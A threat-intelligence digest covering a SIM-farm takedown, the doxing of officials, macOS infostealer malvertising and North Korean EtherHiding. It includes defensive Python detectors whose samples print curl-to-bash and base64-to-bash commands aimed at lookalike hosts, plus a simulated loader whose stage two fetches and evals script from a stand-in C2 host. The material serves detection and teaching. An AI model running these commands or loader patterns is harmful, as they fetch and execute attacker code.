Major Incidents or Breaches

  • Europol dismantled a cybercrime-as-a-service SIM farm network that had been used to register roughly 49 million fake accounts worldwide. The service let paying clients create and abuse accounts in bulk using phone numbers from the farm's SIM pool, supporting a range of criminal activity including fraud and phishing.

  • Hackers published the personal information ("doxing") of officials from US agencies including ICE, DHS, DOJ, and FBI. The same leak exposed details of a secret FBI anti-ransomware task force.

Newly Discovered Vulnerabilities

  • Security researchers identified a new .NET backdoor, dubbed CAPI Backdoor, delivered as a malicious ZIP attachment in phishing emails. The campaign has targeted Russian automobile and e-commerce companies.

Notable Threat Actor Activity

  • A new campaign is delivering infostealers such as AMOS (Atomic macOS Stealer) and Odyssey to macOS users. Attackers buy Google Ads that lead to fake download pages for popular software including Homebrew, LogMeIn, and TradingView; the Homebrew lure in particular targets macOS developers, who are accustomed to installing tooling from a pasted terminal command.

  • North Korean threat actors have been observed storing malicious payloads inside smart contracts on the Ethereum blockchain (a technique known as EtherHiding) and retrieving them with read-only contract calls, using the chain as a covert, takedown-resistant delivery channel.
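
The macOS malvertising campaign above (and the matching trend item below) relies on the victim running an installer command copied from a fake download page. The following is an added example, not code from the original digest or from any of the vendors named here: a small rule set that triages process-execution telemetry for two delivery patterns, a remote script fetched and piped into a shell, and a base64 blob decoded into a shell. The real Homebrew installer is itself a `curl` one-liner from raw.githubusercontent.com, so the check allowlists known installer hosts rather than flagging every `curl | bash`. The sample events, the allowlist and the lookalike domains are constructed for this example.

```python
from __future__ import annotations

import re
from dataclasses import dataclass
from urllib.parse import urlparse


@dataclass
class ProcEvent:
    """One process-execution record, as an EDR or osquery would report it."""
    pid: int
    parent: str
    cmdline: str


@dataclass
class Finding:
    pid: int
    rule: str
    detail: str


# Hosts that legitimately serve installer scripts in this environment.
# Assumption for the example: the official Homebrew installer is fetched
# from raw.githubusercontent.com; extend for your own tooling.
TRUSTED_SCRIPT_HOSTS = {"raw.githubusercontent.com", "github.com"}

URL_RE = re.compile(r"https?://[^\s\"')|]+")
# curl/wget output piped straight into a shell, optionally via sudo.
FETCH_TO_SHELL_RE = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(/bin/)?(ba|z)?sh\b")
# The $(curl ...) form executed by `bash -c "..."`, as the real Homebrew installer uses.
FETCH_SUBST_RE = re.compile(r"\$\(\s*(curl|wget)\b")
# base64 -d / -D / --decode piped into a shell: the classic copy-paste lure.
B64_TO_SHELL_RE = re.compile(r"base64\s+(-d|--decode|-D)\b[^|]*\|\s*(sudo\s+)?(/bin/)?(ba|z)?sh\b")


def analyze(event: ProcEvent) -> list[Finding]:
    findings: list[Finding] = []
    cmd = event.cmdline
    if B64_TO_SHELL_RE.search(cmd):
        findings.append(Finding(event.pid, "b64_decode_to_shell",
                                "base64-decoded blob piped into a shell"))
    if FETCH_TO_SHELL_RE.search(cmd) or FETCH_SUBST_RE.search(cmd):
        hosts = {urlparse(u).hostname for u in URL_RE.findall(cmd)}
        untrusted = sorted(h for h in hosts if h and h not in TRUSTED_SCRIPT_HOSTS)
        # Flag when any source host is not allowlisted, or when no URL could be
        # recovered at all (obfuscated or variable-built URLs deserve a look too).
        if untrusted or not hosts:
            findings.append(Finding(event.pid, "remote_script_to_shell",
                                    f"remote script executed from {untrusted or 'unknown source'}"))
    return findings


def scan(events: list[ProcEvent]) -> list[Finding]:
    return [f for e in events for f in analyze(e)]


# Constructed sample telemetry (not real campaign data). The .example domains
# stand in for lookalike sites a malvertising campaign would register.
SAMPLE_EVENTS = [
    # Genuine Homebrew install one-liner: trusted host, no finding.
    ProcEvent(101, "Terminal",
              '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'),
    # Same shape, but fetched from a lookalike domain.
    ProcEvent(102, "Terminal",
              '/bin/bash -c "$(curl -fsSL https://brew-installer.example/install.sh)"'),
    # "Paste this into Terminal" lure: base64 decoded straight into bash.
    ProcEvent(103, "Terminal", "echo ZWNobyBoaQ== | base64 -d | bash"),
    # Benign activity.
    ProcEvent(104, "Terminal", "ls -la ~/Downloads"),
]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"pid={f.pid} rule={f.rule}: {f.detail}")
```

On a fleet this would run over the command-line field of your process events; the allowlist is the part that needs local tuning, and `parent` is there so you can further weight commands spawned by a terminal that the user just pasted into versus scripted CI runs.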

Trends, Tools, or Tactics of Interest

  • The use of cybercrime-as-a-service (CaaS) infrastructures, such as large-scale SIM farms, continues to facilitate mass account fraud and related cybercrime.

  • Increased use of malvertising via search engines, specifically Google Ads, to distribute infostealers targeting macOS users, and in particular developers who install tooling such as Homebrew from a pasted terminal command.

  • Threat actors are using public blockchains as an alternative malware delivery channel: a payload stored in a smart contract cannot be taken down, can be replaced by the attacker with a single transaction, and is fetched over ordinary JSON-RPC traffic to public nodes rather than from attacker-owned infrastructure that defenders could block or seize.
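
To make the blockchain delivery channel concrete (both the North Korean item above and this trend item), here is an added example written for this digest, not code from the original page or from any reported sample. It shows the two halves of the pattern: the loader side, which issues a read-only `eth_call` to a contract and ABI-decodes the `string` it returns, and the defender side, which triages a JavaScript snippet for the retrieve-and-execute shape. The contract address, function selector, stage-two script and the stand-in node are all constructed placeholders; a real selector is the first four bytes of the Keccak-256 hash of the function signature, which is not computed here.

```python
from __future__ import annotations

import re

# --- ABI helpers. A Solidity function returning `string` encodes the result as
#     [32-byte offset][32-byte length][UTF-8 data padded to a 32-byte boundary].

def abi_encode_string(s: str) -> str:
    data = s.encode()
    head = (32).to_bytes(32, "big")          # offset of the dynamic part
    length = len(data).to_bytes(32, "big")
    pad = b"\x00" * (-len(data) % 32)
    return "0x" + (head + length + data + pad).hex()


def abi_decode_string(hexdata: str) -> str:
    raw = bytes.fromhex(hexdata.removeprefix("0x"))
    offset = int.from_bytes(raw[0:32], "big")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    return raw[offset + 32:offset + 32 + length].decode()


# --- JSON-RPC. eth_call executes a contract view locally on the node: no
#     transaction is created, no gas is spent, and nothing is written on chain.

def build_eth_call(contract: str, selector: str, block: str = "latest") -> dict:
    return {"jsonrpc": "2.0", "id": 1, "method": "eth_call",
            "params": [{"to": contract, "data": selector}, block]}


# Constructed stand-in for a chain node. Address, selector and payload are
# placeholders for this example, not real on-chain values.
ATTACKER_CONTRACT = "0x" + "ab" * 20
GET_PAYLOAD_SELECTOR = "0x12345678"
STAGE2 = "var u='https://c2.example/s.js';fetch(u).then(r=>r.text()).then(t=>eval(t))"
FAKE_CHAIN_STATE = {(ATTACKER_CONTRACT, GET_PAYLOAD_SELECTOR): abi_encode_string(STAGE2)}


def fake_node(request: dict) -> dict:
    """Answers eth_call like a public RPC endpoint would, from constructed state."""
    call, _block = request["params"]
    key = (call["to"].lower(), call["data"].lower())
    return {"jsonrpc": "2.0", "id": request["id"], "result": FAKE_CHAIN_STATE.get(key, "0x")}


def fetch_stage(contract: str, selector: str) -> str:
    """What an EtherHiding-style loader does: one read-only round-trip, then decode."""
    resp = fake_node(build_eth_call(contract, selector))
    return abi_decode_string(resp["result"])


# --- Detection side: does a script fetch contract state and feed it to an
#     execution sink? Any one indicator is common; all three together is the pattern.

EXEC_SINKS = re.compile(r"\b(eval|Function)\s*\(|\.innerHTML\s*=|document\.write\s*\(")
ADDRESS_RE = re.compile(r"0x[0-9a-fA-F]{40}")


def loader_indicators(js: str) -> dict:
    return {
        "uses_eth_call": "eth_call" in js,
        "contracts": sorted(set(ADDRESS_RE.findall(js))),
        "has_exec_sink": bool(EXEC_SINKS.search(js)),
    }


def is_etherhiding_loader(js: str) -> bool:
    ind = loader_indicators(js)
    return ind["uses_eth_call"] and bool(ind["contracts"]) and ind["has_exec_sink"]


# Constructed loader snippet in the shape described above (not a real sample).
SAMPLE_LOADER = (
    'fetch("https://rpc.example",{method:"POST",body:JSON.stringify({method:"eth_call",'
    'params:[{to:"' + ATTACKER_CONTRACT + '",data:"' + GET_PAYLOAD_SELECTOR + '"},"latest"]})})'
    '.then(r=>r.json()).then(j=>eval(decodeString(j.result)))'
)
# Benign wallet code that reads a balance and only renders it as text.
SAMPLE_BENIGN = 'rpc({method:"eth_getBalance",params:[addr,"latest"]}).then(b=>el.textContent=b)'


if __name__ == "__main__":
    print("loader fetched:", fetch_stage(ATTACKER_CONTRACT, GET_PAYLOAD_SELECTOR))
    print("sample loader flagged:", is_etherhiding_loader(SAMPLE_LOADER))
    print("benign flagged:", is_etherhiding_loader(SAMPLE_BENIGN))
```

The defensive consequence follows from the request shape: the only network artefact of retrieval is a POST to a public RPC provider, so blocking or alerting on JSON-RPC traffic from hosts that have no business talking to a blockchain node is a more reliable control than chasing the contract itself, which cannot be taken down.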